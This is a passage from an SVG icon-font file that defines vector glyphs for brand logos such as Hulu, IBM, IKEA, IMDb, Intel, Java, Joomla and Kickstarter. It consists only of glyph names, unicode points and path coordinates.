<glyph glyph-name="brand-hulu" horiz-adv-x="1000" unicode="&#xe8e9;" d="M473 279c-1-6-3-11-6-15-5-4-10-6-16-6h-46c-6 0-11 2-15 6-4 4-6 9-6 15v133h-79v-140c0-18 3-34 11-47 7-13 18-23 31-30 14-6 29-10 48-10h78v1c16 0 31 4 42 11 12 7 21 17 28 30 6 13 9 29 9 45v140h-79v-133z m-270 125c-14 6-29 9-46 8h-51l-20-2c-4-2-7-3-7-3v108h-79v-330h79v134c1 5 3 11 7 14 4 4 9 6 15 6h46c6 0 11-2 15-6 4-3 6-9 7-14v-134h79v144c0 20-4 36-12 48-9 12-19 21-33 27z m410 111h79v-330h-79z m387-103h-80v-133c0-6-2-11-6-15-3-4-8-6-14-6h-47c-6 0-11 2-15 6-4 4-6 9-6 15v133h-80v-140c1-18 4-34 12-47 8-13 18-23 31-30 14-6 30-10 48-10h77v1c17 0 31 4 44 11 11 7 20 17 26 30 7 13 10 29 10 45l0 140z" />
<glyph glyph-name="brand-hyundai" horiz-adv-x="1000" unicode="&#xe8ea;" d="M558 604c99-6 194-24 285-66 39-18 76-41 107-73 23-24 40-51 47-84 8-36 0-70-19-102-19-32-47-57-78-78-53-36-112-59-174-76-41-11-82-18-125-23-46-5-92-7-139-5-93 3-183 17-270 51-42 17-82 38-117 66-29 24-54 51-66 87-17 45-9 88 17 128 23 34 54 60 89 81 53 33 111 54 171 69 40 10 80 17 121 21 18 2 36 4 53 4 2 0 95 0 98 0z m-161-165c-1-33 11-49 35-55 9-2 18-3 28-2 20 1 41 4 61 10 85 25 164 63 240 109 3 2 7 5 9 8 5 6 4 11-1 15-3 3-7 4-11 6-18 8-37 12-56 17-64 16-130 24-196 22-27-2-50-11-69-32-26-30-37-66-40-98z m79-305c11-1 21 0 32 1 14 1 27 5 39 14 16 14 29 30 40 49 12 23 21 47 19 74-1 9-4 18-10 25-11 13-25 17-41 18-22 2-44-2-65-6-96-20-182-59-258-120-6-5-6-10 1-14 7-4 16-7 24-9 38-11 77-18 116-24 34-4 69-8 103-8z m-434 216c0-14 3-27 9-41 11-25 28-46 47-64 9-9 19-17 32-22 10-3 17-2 23 8 5 7 8 14 11 22 30 82 74 155 126 225 14 19 30 36 43 57 5 7 3 11-6 11-10 1-21 0-31-3-46-13-91-28-134-51-33-17-64-38-89-67-18-21-31-46-31-75z m914 1c0 4 1 8 0 12-9 52-38 90-85 113-10 5-16 3-21-8-4-7-8-14-11-21-22-47-44-93-70-137-21-37-42-73-67-107l-28-37c-2-3-3-6-1-10 2-2 6-1 9-1 55 10 108 27 158 53 33 18 63 38 87 67 18 22 30 47 29 76z" />
<glyph glyph-name="brand-ibm" horiz-adv-x="1000" unicode="&#xe8eb;" d="M436 552c6-2 12-3 18-4 16-4 30-12 43-23 1 0 2-1 3-1l-1-1h-279v29h216z m-242 0v-29h-194v29h194z m806 0v-29h-167c4 10 7 19 11 29h156z m-289 0l9-25c0-2 0-3 1-4h-165v28l155 1z m67-187c2 8 5 16 8 23 0 2 1 3 3 3 51 0 102 0 153 0 1 0 2 0 3 0v-28h-82v19l-1 0-1-4c-2-5-4-9-5-14 0-1-1-2-3-2-1 0-1 0-2 0-49 0-98 0-147 0-2 0-4 1-5 4-1 5-3 10-6 16v-20h-82v29h3c50 0 101 0 151 0 2 0 3-1 4-3 2-8 5-15 8-23 0 0 1 0 1 0z m-558 104v29h3c99 0 197 0 295 0 3 0 4-1 5-3l7-22c0-1 0-2 0-4h-310z m311-239c-2-8-3-17-8-25-2-2-3-3-6-3-98 0-196 0-294 0h-3v28h311z m-311-82v29h281c0-1 0-1 0-1-3-3-7-6-11-9-17-12-36-18-57-19-57 0-114 0-172 0-12 0-25 0-38 0-1 0-2 0-3 0z m56 161v28h4c69 0 139 0 209 0 1 0 3 0 4-1 9-8 17-16 23-26 1 0 1 0 1-1l-241 0z m0 53v29h240l-2-3c-5-9-12-17-20-24-1-1-3-1-4-2-2 0-3 0-5 0h-209v0z m-276 107v29h194v-29h-194z m194-292v-29h-194v29h194z m0 53v-28h-194v28h194z m621 239c0 1 0 3 1 4 2 7 5 15 8 22 0 2 1 3 3 3 57 0 114 0 171 0 0 0 1 0 2 0v-29l-185 0z m-75 0h-184v29h4c55 0 111 0 167 0 2 0 3-1 4-3 3-9 6-17 9-26z m205-25v-29h-150c4 9 7 19 10 28 0 0 1 0 2 1 0 0 1 0 2 0h136z m-334-29v29h4c43 0 87 0 130 0 3 0 4-1 5-4 3-8 6-16 9-25h-148z m389-267h-137v29h137v-29z m-307 29v-29h-137v29h137z m170 25v29h137v-29h-137z m-170 28v-28h-137v28h137z m17 107h136c-2-7-4-14-7-21l0 0c-3-7-3-7-10-7-35 0-71 0-106-1-3 0-4 1-4 4-3 8-6 16-9 25z m18-54h99c-1-5-3-10-5-15-1-4-3-7-4-11 0-2-1-2-3-2l-74 0c-1 0-3 0-3 1-3 9-6 18-10 27z m-193-28h-90v28h3c26 0 52 0 78 1 3 0 4-1 5-4 1-8 3-16 4-25z m-92 160v29h89c0-10-1-19-3-28-1 0-1-1-2-1-1 0-2 0-2 0h-82z m-82-132v-28h-84v28h84z m-223-28h-83v28h83v-28z m555 28v-28h-82v28h82z m-333 161v-29h-84v29h84z m-306-81v28h84v-28h-84z m1 81h83v-29h-83v29z m83-135h-83v28h83v-28z m807-26v-28h-82v28h82z m-334 26v28h82v-28h-82z m252 0v28h82v-28h-82z m-64-107h-41c0 0-1 1-1 1-3 9-7 18-10 27h62c-4-9-7-18-10-28z m-33-25h24c-2-6-4-12-6-18-1-3-2-6-4-9 0-1-1-2-2-2-1 0-2 1-2 2-4 9-7 18-10 27z" />
<glyph glyph-name="brand-icofont" horiz-adv-x="1000" unicode="&#xe8ec;" d="M863 289c-74 326-364 253-364 253-3-1-6-2-9-3-133-40-265-81-398-120-31-9-40-31-25-56 25-39 55-74 83-110 13-16 29-30 36-48 35-91 117-146 209-134 40 6 80 17 126 27-12-61-24-116-35-170-14-65-4-78 57-78 219-1 375 214 320 439z m-441-145c-60-15-137 7-165 70 44 14 86 27 129 39 62 18 124 39 187 48 70 11 138-36 155-88-42-6-87-9-130-19-67-16-109-34-176-50z m320-134c-47-63-112-96-196-93 14 65 21 129 43 186 9 22 53 39 81 39 26 0 63-20 75-42 12-23 12-70-3-90z m47 230c-56 102-166 150-274 119-75-21-148-45-223-67-66-19-125 9-154 74 121 37 237 78 356 108 157 39 303-85 318-270-10 16-17 26-23 36z m2 610c-82 0-149-67-149-149 0-82 66-149 149-149s149 67 149 149c0 82-67 149-149 149z m0-246c-54 0-97 44-97 97 0 53 43 97 97 97s97-44 97-97c0-54-44-97-97-97z" />
<glyph glyph-name="brand-icq" horiz-adv-x="1000" unicode="&#xe8ed;" d="M788 631c73 2 132-21 165-90 24-51 8-101-46-167 86-53 93-151 60-221-19-40-48-70-90-86-42-17-84-13-125 4 8-135-133-204-225-115-17-46-48-79-94-96-43-15-85-13-127 4-45 17-79 48-97 93-18 46-13 90 8 135-63-2-114 17-140 77-22 52-9 99 29 140-2 1-3 3-5 3-88 36-110 139-60 214 41 61 121 92 196 77 3-1 6-1 11-2-4 6-6 11-9 16-23 45-27 90-4 137 25 52 76 72 128 67 41-4 76-21 105-51 1-1 2-2 4-4 56 94 159 97 224 67 80-36 110-101 92-202z m-220-169c47 55 94 110 140 166 10 12 16 30 19 46 6 44-18 79-62 98-75 32-151-17-142-99 6-56 9-112 12-169 1-16 3-30 21-35 3-1 6-3 12-7z m39-189c52-43 104-87 157-130 18-15 40-21 64-18 44 5 74 34 86 81 17 72-30 126-104 117-22-2-44-4-66-6-38-3-76-6-114-10-4-1-9-3-11-7-5-7-7-16-12-27z m-191-52c-10-11-19-20-27-29-34-39-68-76-101-115-18-23-26-49-20-79 10-58 79-90 131-77 48 12 74 53 68 106-6 55-11 109-17 164-1 12-3 20-17 22-6 1-11 5-17 8z m-52 205c-27 27-54 55-82 81-18 18-41 27-66 30-46 8-99-16-121-53-27-47-8-99 41-112 15-4 32-4 47-3 47 6 94 13 140 19 17 2 30 6 34 24 1 4 4 7 7 14z m259-44c1-1 2-1 2-1 62 7 123 13 184 22 39 6 68 28 81 66 7 18 7 37-3 54-22 34-88 59-130 22-48-42-94-86-140-129-3-2-4-7-4-10 3-8 7-16 10-24z m-165 105c0 3 0 4 0 6-5 56-10 112-15 168-6 49-30 79-71 90-39 10-71-5-81-39-8-27-1-52 16-75 10-14 22-27 32-41 30-39 59-78 89-118 9 3 19 6 30 9z m164-503c20 0 35 9 47 26 21 30 20 68-7 98-32 38-67 74-102 110-1 2-4 4-6 4-16-2-22-12-21-27 4-34 8-69 12-103 3-26 7-52 22-75 13-19 30-33 55-33z m-138 280c45 0 82 37 83 82 0 45-38 83-84 83-45 0-82-37-82-82-1-46 37-83 83-83z" />
<glyph glyph-name="brand-ikea" horiz-adv-x="1000" unicode="&#xe8ee;" d="M0 523v-345h1000v345h-1000z m500-336c-272 0-493 73-493 163s221 164 493 164 493-74 493-164-221-163-493-163z m-270 224c1 1 0 2-2 2h-84c-2 0-3-1-2-2 1-2 3-9 3-17v-93c0-8-2-15-3-16-1-2 0-3 2-3h84c2 0 3 1 2 3-1 1-2 8-2 16v93c0 8 1 15 2 17z m206-53c-2 2-2 4-1 6l34 48c1 0 1 1 0 1h-83c0 0 0-1 0-1s0-3-1-4l-31-42v28c0 8 2 16 3 17 1 1 0 2-2 2h-81c-3 0-4-1-2-2 1-1 2-9 2-17v-93c0-8-2-15-2-16-2-2-1-2 2-2h81c2 0 3 0 2 2-1 1-3 8-3 16v32l27-40c1-2-1-8-1-9 0-1 0-1 1-1h101c1 0 1 0 0 1l-46 74z m73 52c1-1 3-8 3-16v-92c0-8-2-15-3-16-1-1 0-2 2-2h146v38c0 2-1 3-2 2-2-1-9-3-17-3h-46c-2 0-2 2-2 3v7c0 0 0 2 2 2h32c3 0 15 1 16 0s3-1 3 1v32c0 2-2 2-3 1-1-1-13 0-16 0h-32c-2 0-2 1-2 2v6c0 1 0 2 2 2h46c8 0 15-1 17-2 1-1 2 0 2 2v36h-146c-2 0-3-1-2-3z m330-1c1 3 0 3-2 3h-114c-2 0-3 0-2-3 2-3 1-7 0-8l-43-118h69c2 0 2 1 2 2-1 1-1 4 0 6l4 12c1 4 3 4 6 4h31c3 0 4 0 5-4l4-12c1-2 1-5 0-6 0-1 0-2 2-2h87s-48 116-49 118-1 5 0 8z m-59-76h-16c-1 0-1 1 0 2l7 18c0 0 1 1 1 1s1-1 1-1l8-18c0-1 0-2-1-2z" />
<glyph glyph-name="brand-imdb" horiz-adv-x="1000" unicode="&#xe8ef;" d="M139 154v398h135c8-61 17-122 26-183h1c7 61 15 122 23 183h136v-398h-91v263h-1c-12-88-23-176-35-263h-65l-38 260 0-1v-259h-91z m356 398h4c34 0 67 0 100 0 22 0 44-1 66-6 16-3 31-9 42-22 12-11 19-26 20-42 2-18 3-36 3-54 0-55 0-110 0-165 0-18-1-36-3-53-4-28-20-44-46-51-13-4-26-5-39-5-26-1-52-1-79-1-21 0-42 0-64 0h-4c0 133 0 266 0 399z m104-330c5 1 11 1 16 2 8 2 12 7 13 14 1 9 3 19 3 28 0 55 0 110 0 165 0 11-1 22-1 33 0 7-2 13-9 17-7 3-15 3-23 3l1-262z m266 330v-128l1-1c1 2 3 4 4 5 13 13 29 20 47 22 16 2 31 1 46-4 20-8 32-21 35-41 2-10 2-20 2-29 0-49 0-97 0-146 0-12-2-24-4-36-6-22-21-36-43-42-32-9-61-3-85 23-1 1-2 2-3 4-2-8-4-15-5-22-1-3-2-4-5-4-29 0-57 0-86 0h-4v399h100z m0-256h0c0-19 0-38 0-56 1-8 1-16 3-24 1-6 5-9 10-9 3-1 7 0 11 1 5 1 9 5 9 11 1 9 2 18 2 27 0 34 0 69 0 103 0 9-1 18-1 27-1 11-5 15-15 17l0 0c-9 0-16-1-17-13-1-7-2-14-2-21 0-21 0-42 0-63z m-865 256h103v-398h-103v398z" />
<glyph glyph-name="brand-indiegogo" horiz-adv-x="1000" unicode="&#xe8f0;" d="M0 89h523v66h-33v-33h-457v456h457v-268h33v301h-523z m115 205h33v-123h-33z m117-57l-33 57h-35v-123h32v64h0l38-64h30v123h-31v-57z m49 57v-123h41c39 0 58 10 58 62 0 51-19 61-58 61h-41z m65-62c0-31-9-33-21-33h-11v65h10c14 0 22-1 22-32z m45 62h33v-123h-33z m306 2c-46 0-54-30-54-64 0-33 8-63 54-63 46 0 54 30 54 63 0 34-8 64-54 64z m0-98c-18 0-21 13-21 33 0 20 3 33 21 33 18 0 20-13 20-33 0-20-2-33-20-33z m231 98c-46 0-54-30-54-64 0-33 8-63 54-63 46 0 54 30 54 63 0 34-8 64-54 64z m0-98c-18 0-21 13-21 33 0 20 3 33 21 33 18 0 20-13 20-33 0-20-2-33-20-33z m65-8c-6 0-8-4-8-9 0-5 2-9 8-9s7 4 7 9c0 5-1 9-7 9z m0-17c-5 0-7 3-7 8 0 4 2 8 7 8 4 0 6-4 6-8s-2-8-6-8z m4 10c0 2-1 4-4 4h-4v-12h2v4h2l1-4h3l-2 5c1 0 2 1 2 3z m-4-2h-2v4h2c1 0 1-1 1-2s0-2-1-2z m-413 37h21v-2c0-13 0-19-16-19-15 0-20 7-20 34 0 29 8 33 21 33 10 0 17-3 22-6l18 28c-9 6-23 10-38 10-43 0-57-21-57-64 0-37 10-63 51-63 7 0 13 1 19 2h30v74h-48l-3-27z m231 0h21v-2c0-13 0-19-16-19-15 0-20 7-20 34 0 29 9 33 21 33 10 0 17-3 23-6l17 28c-9 6-23 10-38 10-43 0-56-21-56-64 0-37 10-63 50-63 7 0 13 1 19 2h30v74h-48l-3-27z m-288 46v30h-82v-123h82v29h-50v19h33l4 29h-37v16z" />
<glyph glyph-name="brand-intel" horiz-adv-x="1000" unicode="&#xe8f1;" d="M830 198c0 0-1 0-1 0-30-18-62-33-95-45-47-18-95-32-144-43-42-10-85-17-128-20-22-2-44-3-66-4-23 0-47 0-71 2-24 1-47 3-70 7-26 4-51 10-76 19-30 11-57 25-81 46-20 18-36 39-46 64-11 28-14 56-12 85 2 24 8 47 16 69 12 31 29 59 52 84 0 1 1 2 1 3v26c-1-1-1-1-2-2-13-12-26-24-37-38-22-25-39-52-52-82-10-25-16-50-18-77-1-17 0-34 3-52 3-20 8-40 17-59 16-35 40-63 71-86 28-20 59-35 92-46 41-14 84-22 128-26 22-2 43-3 65-4 26 0 51 1 77 2 18 2 35 3 53 5 22 3 44 6 65 10 45 9 89 19 132 33 43 14 85 31 125 52 2 1 2 2 2 4l0 71c1 1 1 1 0 2z m169 270c0 8-2 17-3 25-5 22-13 43-26 62-8 13-18 25-30 36-6 6-13 12-21 18-12 9-25 17-38 24-15 7-30 14-46 19-21 8-43 13-65 18-13 2-26 4-40 6-10 1-21 2-31 3-9 1-19 1-28 1-27 1-54 1-80-1-20-2-39-4-58-7-24-3-48-7-72-13-59-13-115-32-170-58-24-11-48-24-71-38-1 0-2 0-2-2v-18c1 0 2 1 3 1 13 7 26 13 39 19 57 25 116 45 177 59 37 9 74 15 112 19 22 3 43 4 65 5 31 1 61 0 91-3 21-3 41-6 62-10 31-8 62-18 90-34 22-13 42-29 58-49 28-37 39-78 32-123-4-26-14-49-29-70-17-26-40-46-66-62-2-1-2-2-2-4 0-17 0-33 0-50v-3c3 2 6 3 9 4 39 17 71 43 96 76 33 44 49 94 44 150z m-267-114c-1 16-4 31-12 45-9 19-23 33-43 40-17 7-35 7-52 4-30-7-51-24-63-51-8-16-10-33-11-51 0-16 2-32 7-47 8-22 22-40 43-50 23-11 48-12 73-7 20 3 37 14 52 28 1 2 1 2 0 3-10 9-19 18-28 27-2 2-3 2-5 0-15-16-34-20-55-16-21 3-35 20-35 42-1 2 0 3 2 3 21-1 42 0 63 0h63c1 0 2 0 2 2 0 9 0 18-1 28z m-53 4c-12 1-24 1-37 1s-24 0-37-1c-2 0-3 1-2 3 1 11 4 22 12 30 11 11 32 15 46 7 10-5 15-13 18-23 2-5 2-9 3-14 0-2-1-3-3-3z m-433-121c16 0 31 0 46 0 2 0 3 1 3 3l0 157c0 2 0 3 2 3 13 0 26 0 39 0 3 0 5-1 8-1 8-1 12-6 14-14 1-2 1-5 1-7v-138c0-2 0-3 3-3 15 0 30 0 45 0 3 0 3 1 3 3 0 47 0 93 0 140 0 5 0 11-1 16-3 14-9 25-21 34-10 8-23 11-35 11-36 0-71 0-106 0-3 0-3 0-3-3v-99c0-33 0-66-1-99 0-2 1-3 3-3z m250 260c-15 0-30 0-45 0-2 0-3 0-3-3 0-34 0-67 0-101 0-33 0-66 0-99 0-12 4-23 11-33 11-16 27-23 46-23 10-1 21 0 31 0 2 0 2 0 2 2 0 13 0 25 0 38 0 2 0 3-2 3-7 0-14 0-21 0-8 0-13 4-15 12 0 2-1 4-1 6 0 33 0 65 0 98 0 2 1 2 3 2l34 0c2 0 2 1 2 3 0 12 0 24 0 37 0 2 0 2-2 2l-34 0c-2 0-3 0-3 3l0 50c1 3 0 3-3 3z m287-247c9-6 19-9 30-10 2-1 2 1 2 3v280c0 3 0 3-3 3h-46c-3 0-3 0-3-3v-227c0-5 0-9 1-14 2-13 8-24 19-32z m-588 191c-15 0-31 0-46 0-3 0-3 0-3-3v-147c0-4 0-8 0-12 3-16 10-28 24-36 8-4 16-6 25-7 2-1 3 0 3 2 0 33 0 67 0 100v100c0 3-1 3-3 3z m-47 29c8 0 16 0 24 0h24c1 0 2 0 2 2 0 15 0 30 0 45 0 2-1 2-3 2-15 0-31 0-47 0-2 0-2-1-2-2 0-15 0-30 0-45 0-2 0-2 2-2z" />
<glyph glyph-name="brand-ipair" horiz-adv-x="1000" unicode="&#xe8f2;" d="M500 761c-276 0-500-168-500-375 0-112 65-212 168-281-10-52-27-115-61-166 44 0 155 51 234 91 50-13 103-20 159-20 276 0 500 168 500 376 0 207-224 375-500 375z m239-381c-1-7-4-14-9-23-9-17-22-32-36-44-70-74-194-156-194-156s-124 82-194 156c-15 12-27 27-36 44-5 9-8 16-10 23-5 15-8 31-8 48 0 83 68 151 151 151 55 0 97-61 97-101 0 40 20 101 97 101 83 0 150-68 150-151 0-17-3-33-8-48z" />
<glyph glyph-name="brand-jaguar" horiz-adv-x="1000" unicode="&#xe8f3;" d="M993 243c-7 3-14 3-21 0-26-14-52-13-78 0-36 17-71 37-106 56-83 45-167 89-254 127-108 48-219 88-336 107-37 5-75 9-113 3-21-3-40-10-56-24-3-2-6-4-6-7 1-6-3-9-6-12l-14-12c-1-1-3-2-3-4-1-15 10-29 25-31 5 0 10-1 15-3 4-2 6-1 4 4-2 6-2 12 1 18 3 6 9 10 16 9 6-1 8-6 10-12 1-9-2-16-9-22-1-1-3-2-4-2-7 3-10 0-10-7 0-1 0-1 0-1-4-8-3-15 4-20 6-5 12-5 19 0 10 7 19 15 30 22 15 9 32 13 51 8 27-6 49-22 72-39-7-1-13-2-19-2-18 0-33-8-48-19-9-6-17-14-20-26-5-20 8-36 28-34 12 1 21 11 24 23 2 10 2 10 13 10 3 0 5-1 8-1 11-2 22-7 32-12 23-10 47-17 72-15 14 1 27 4 35 17 1 2 3 1 5 0 28-11 58-14 89-14 27 0 53 1 80 1 18 0 32-6 40-23 1-4 3-8 5-11 26-46 63-73 117-70 22 0 44 1 66 0 22-2 43-6 60-22 16-14 34-26 54-36 10-5 21-7 32-5 18 2 26 11 23 29-1 4 1 4 4 4 11-1 23 0 34 2 17 4 31 12 40 27 4 8 2 16-5 19z m-4-22c-8-11-19-17-32-18-28-4-53 4-78 16-14 7-26 15-35 27-15 22-37 29-62 32-16 1-31 3-47 6-10 2-19 7-26 16-10 11-18 22-29 32-1 1-3 3-5 4l-1-1c7-11 14-22 20-34 9-19 26-26 46-29 13-1 27 0 40 0 11 0 22-2 33-6 12-4 22-11 27-22 7-12 17-20 28-26 5-4 10-7 16-10 2-2 5-3 7-5 5-4 11-7 9-15-1-5-10-12-17-13-11-1-21 3-30 8-16 8-29 19-42 31-18 17-40 25-65 25-26 1-52 0-79 2-38 3-68 21-89 54-4 6-7 12-11 18-10 20-27 33-45 47 3-8 9-13 9-21-22 0-45 0-67 0-18 0-37 1-55 4-17 4-33 12-49 17-3 1-4 2-3 5 1 10-2 20-5 31 36-12 72-19 109-16-22 3-44 8-66 15-21 8-42 17-62 30 2-9 3-16 4-24 1-9 2-19 0-28-4-17-15-27-32-28-21-1-40 5-59 10-15 5-31 10-47 10-7 0-14-2-20-5-6-3-6-7-1-11 4-3 3-6 1-10-5-8-14-13-21-10-7 3-11 8-10 16 1 13 8 23 19 30 11 9 25 12 39 14 20 2 40 0 60-2 3 0 7-3 10 1-31 10-51 30-56 64-5-13-4-25 0-39-4 5-7 7-9 10-17 17-37 28-61 32-5 1-9 3-11 8-4 7-9 14-15 19-3 3-6 5-11 5 2-4 3-8 4-12 3-12 1-19-9-26-13-10-27-18-39-29-2-1-4-2-6-2-3 0-7-1-8 3-2 3 1 4 3 6 7 6 14 12 20 19 8 11 6 29-4 38-7 6-15 5-23-1-6-6-11-14-16-21-7-8-12-10-19-4-7 6-7 15 0 22 7 7 16 11 26 12 10 1 20 5 28 12 2 1 5 3 4 6-1 2-4 3-6 3-10-1-19 0-25-10-1-1-2-2-3-3-2-2-5-5-8-2-3 4-2 8 2 10 8 6 16 10 25 13 24 7 48 6 72 4 0 0 1 0 1 0 4-1 9 1 10-2 1-3-5-5-7-8-6-5-13-7-21-7-6 0-11 0-18 0 3-4 7-9 12-10 28-6 52-20 75-37l1 0c-9 19-24 30-42 39-3 2-9 2-8 7 0 4 5 5 9 6 21 7 43 7 64 3 38-7 74-20 103-47 2-2 5-4 8-7-3 10-6 17-9 26 12-3 24-6 35-9 109-30 214-73 316-121 79-38 156-79 234-120 24-13 49-16 75-5 4 1 7 3 11 3 4 0 7 0 10-4 2-4 1-8-1-11z m-943 278c2 5 6 4 10 4-3-3-6-4-10-4z m87 20c-11 6-24 3-30-5 10-3 20-2 30 5z" />
<glyph glyph-name="brand-java" horiz-adv-x="1000" unicode="&#xe8f4;" d="M486 325c-46 38-91 78-113 136-19 52 10 88 45 120 31 28 65 54 98 81 59 48 104 104 90 188 29-36 27-75 12-115-20-52-57-91-99-126-29-24-60-48-81-81-24-38-21-75-4-115 14-31 42-54 52-88z m-240-327c-14-9-30-11-43-22-13-10-12-16 2-22 36-16 73-19 111-22 130-11 259-8 388 9 28 3 55 11 82 18 15 5 30 12 30 33 16-14 15-23-2-34-25-16-54-25-83-31-189-41-378-36-566-3-15 3-33 4-36 20-5 18 14 25 26 32 28 16 58 28 91 22z m299 285c28 35 27 65 1 96-15 18-28 36-36 57-18 49-4 95 42 134 28 24 61 40 94 55 8 4 15 1 28 1-33-25-63-46-88-73-30-32-34-66-10-103 7-9 14-19 20-28 29-42 26-76-10-112-11-10-20-23-41-27z m111-253c-89-37-180-43-273-24-13 3-26 9-38 15-12 5-27 11-26 26 1 18 19 20 31 27 3 2 9 4 9-2-1-23 18-19 29-20 57-9 114-10 171-1 50 8 50 7 97-21z m36 228c-26-20-57-25-87-29-116-15-232-19-349-2-13 2-27 5-39 13-10 6-11 15 0 21 46 27 97 39 150 42-21-12-47-12-67-26-7-5-18-7-17-17 2-9 13-9 21-11 47-9 94-7 141-6 70 1 140 6 210 16 12 1 24 3 37-1z m-356-73c-8-23-4-29 24-32 83-11 167-9 249 7 27 5 43-7 64-22-22-9-43-12-64-15-88-16-176-22-264-3-15 3-29 6-42 14-19 13-19 21-2 36 10 8 21 16 35 15l0 0z m-36-319c191-3 381-11 564 65-2-16-13-22-24-29-45-24-95-34-146-40-120-15-240-17-360-1-11 1-23 3-34 5z m442 433c30 26 84 20 113-11 24-26 23-73-6-101-30-29-65-52-107-60-7-2-13-4-19-6 13 9 25 20 40 28 15 9 27 19 39 33 22 27 40 54 21 88-17 30-47 37-81 29z m-406-114l0 1 0-1 0 0z" />
<glyph glyph-name="brand-joomla" horiz-adv-x="1000" unicode="&#xe8f5;" d="M324 447l209 204s73 75 177 31c0 0 7 97 113 106 0 0 115-2 115-117 0 0 5-95-101-114 0 0 31-123-55-197l-80 81s58 49 3 111c0 0-53 46-111-9l-183-184-87 88z m274 79l203-208s75-74 31-178c0 0 97-7 105-113 0 0-1-115-116-115 0 0-96-5-114 102 0 0-123-31-197 54l81 81s49-59 111-4c0 0 46 53-9 111l-184 183 89 87z m78-274l-208-203s-74-75-178-31c0 0-7-97-113-105 0 0-115 1-114 116 0 0-5 96 101 114 0 0-31 123 54 197l81-81s-59-49-4-111c0 0 53-46 111 9l183 184 87-89z m-275-79l-202 209s-75 74-31 178c0 0-97 7-105 113 0 0 2 115 116 114 0 0 96 5 114-101 0 0 123 31 197-55l-81-80s-49 58-111 4c0 0-46-53 8-111l184-184-89-87z" />
<glyph glyph-name="brand-kickstarter" horiz-adv-x="1000" unicode="&#xe8f6;" d="M436 356c-6 4-14 8-24 11-7 3-11 5-11 8 0 3 2 4 5 4 1 0 4-1 7-4 6-4 11-6 15-6 5 0 8 1 11 4 2 3 4 7 4 11 0 7-4 13-11 18s-15 7-25 7c-11 0-20-3-28-9-8-7-13-16-13-28 0-16 8-26 25-32 10-3 15-5 16-6 2-1 3-3 3-5 0-3-2-5-5-5-2 0-6 3-12 7-4 4-9 6-13 6-4-1-8-2-12-5-3-3-4-7-4-12 0-7 3-13 9-18 8-7 19-10 31-10 13 0 23 3 30 9 9 7 13 16 13 29 0 11-4 19-11 26z m-105-5l19 27c2 3 3 6 3 10 0 5-2 9-6 13-3 3-8 5-13 5-6 0-11-3-15-8l-20-30v18c0 3-1 6-1 8 0 2-2 4-4 6-4 4-8 6-14 6-5 0-10-2-13-6-3-4-5-8-5-14v-71c0-6 2-11 5-15 3-4 8-6 14-6 6 0 11 3 15 8 2 3 3 7 3 13v19l27-35c3-3 8-5 13-5 5 0 9 2 13 5 4 4 5 8 5 14 0 3-1 7-3 10l-23 28z m-127 21c7 0 12-3 16-7 5-5 7-8 9-8 2-2 5-2 8-2 4 0 7 1 10 3 6 3 8 8 8 15 0 7-4 15-13 22-11 9-24 14-37 14-16-1-29-6-40-16-13-12-19-26-19-43 0-11 3-22 9-31 6-10 14-17 24-22 8-3 17-5 26-5 14 0 27 4 38 14 8 7 12 14 12 21 0 5-2 9-5 12s-8 6-13 6c-4 0-8-2-11-4-2-3-5-5-8-8-4-3-9-5-14-5-6 0-11 2-15 7-4 4-6 9-6 15 0 6 2 11 6 15 4 5 9 7 15 7z m-83 34c-6 0-10-2-14-6-3-3-5-9-5-16v-69c0-7 2-12 5-15 4-4 8-6 14-6 5 0 10 2 13 6 3 4 5 9 5 15v69c0 7-2 13-5 16-3 4-8 6-13 6z m-52-55l19 27c2 3 3 6 3 10 0 5-2 9-6 13-3 3-8 5-13 5-6 0-11-3-15-8l-20-30v18c0 3-1 6-1 8 0 2-2 4-4 6-4 4-8 6-14 6-5 0-10-2-13-6-3-4-5-8-5-14v-71c0-6 2-11 5-15 3-4 8-6 14-6 6 0 11 3 15 8 2 3 3 7 3 13v19l27-35c3-3 8-5 13-5 5 0 9 2 13 5 4 4 5 8 5 14 0 3-1 7-3 10l-23 28z m927-27l-8 13c8 9 12 19 12 29 0 5-1 10-4 16-3 7-7 12-14 17-7 4-14 6-21 6h-24c-15 0-22-7-22-21v-68c0-6 1-11 4-15 3-5 8-7 14-7 6 0 10 2 13 5 4 4 5 8 5 13v15l16-25c3-5 8-8 15-8 5 0 9 2 13 5 3 3 5 8 5 13 0 4-1 8-4 12z m-108 47c6 0 11 2 15 4 3 3 5 8 5 14 0 5-2 9-6 13-3 2-6 3-10 3-1 0-4 0-10 0h-22c-6 0-10 0-12 0-4-1-7-3-10-5-2-3-3-6-4-9 0-2 0-5 0-10v-61c0-6 0-11 1-14 2-4 5-8 10-10 2-1 7-1 14-1h28c7 0 12 1 15 4 4 3 6 7 6 13 0 5-2 9-6 13-3 3-8 4-15 4h-17v8h13c11 0 16 5 16 14 0 4-1 7-4 9-3 3-6 4-10 4h-15v7h18z m-71 33c-2 1-8 1-17 1h-37c-11 0-17 0-20-1-3-2-5-4-7-7-2-2-2-5-2-9 0-5 1-9 5-12 4-3 8-5 13-5h10v-55c0-7 1-11 3-15 4-5 9-7 16-7s11 3 15 8c2 3 3 8 3 14v55h8c7 0 11 2 14 4 4 4 6 8 6 14 0 3-1 6-3 9-2 3-4 5-7 6z m-274-15c0 3-1 6-3 9-2 3-4 5-7 6-2 1-8 1-17 1h-37c-11 0-17 0-20-1-3-2-5-4-7-7-2-3-2-6-2-9 0-5 1-9 5-12 4-3 8-5 13-5h10v-55c0-7 1-11 3-15 4-5 9-7 16-7 6 0 11 3 15 8 2 3 3 8 3 14v55h8c7 0 11 2 14 4 4 4 6 9 6 14z m176-52c8 9 12 19 12 29 0 5-2 10-4 16-3 7-8 12-14 17-7 4-14 6-22 6h-23c-15 0-22-7-22-21v-68c0-6 1-11 4-15 3-5 8-7 14-7 5 0 10 2 13 5 3 4 5 8 5 13v15l15-25c4-5 9-8 15-8 6 0 10 2 13 5 4 3 6 8 6 13 0 4-1 8-4 12l-8 13z m-118 58c-4 8-9 11-17 11-8 0-14-3-17-11l-35-73c-1-4-2-7-2-10 0-4 1-7 3-10 4-6 9-8 15-8 5 0 10 2 13 6 2 2 4 5 6 9h34c2-5 4-9 7-11 3-3 7-4 12-4 5 0 10 2 14 6 2 4 4 8 4 12 0 3-1 6-2 9l-35 74z" />
